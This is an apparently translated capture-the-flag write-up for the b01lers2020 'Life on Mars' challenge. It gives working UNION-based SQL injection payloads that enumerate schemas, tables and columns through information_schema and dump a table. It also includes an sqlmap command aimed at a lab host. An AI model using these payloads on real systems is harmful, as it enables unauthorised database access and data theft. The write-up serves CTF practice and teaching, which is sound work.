[b01lers2020]Life on Mars

Attempt to enter the page it appears on this page

Find a lot of data, try union query: /query?search=amazonis_planitia union select 1,2, find that there areecho

Check the library: /query?search=amazonis_planitia union select version(),database()

Check the table: /query?search=amazonis_planitia union select 1,group_concat(table_name) from information_schema.tables where table_schema='aliens'

After checking, I found that the echoed things are the titles of the first page, query the fields of the table: /query?search=amazonis_planitia union select1,group_concat(column_name) from information_schema.columns where table_name='amazonis_planitia', nothing special

Use the sqlmap tool to scan it

sqlmap download: sqlmap: automatic SQL injection and database takeover tool

python2 sqlmap.py -u http://xxxxxxxx.node4.buuoj.cn:81/query?search=amazonis_planitia --dbs

I found that there are three databases in the modified webpage, and you can check it yourself: /query?search=amazonis_planitia union select 1,group_concat(schema_name) from information_schema.SCHEMATA, there are indeed three databases

I have already queried aliens and found nothing, continue to query the table of alien_code: /query?search=amazonis_planitia union select 1,group_concat(table_name)from information_schema.tables where table_schema='alien_code'

Query the fields of the code table: /query?search=amazonis_planitia union select 1,group_concat(column_name) from information_schema.columns where table_name='code'

Check the content: /query?search=amazonis_planitia union select group_concat(id),group_concat(code) from alien_code.code

This is the end, let's spread the flowers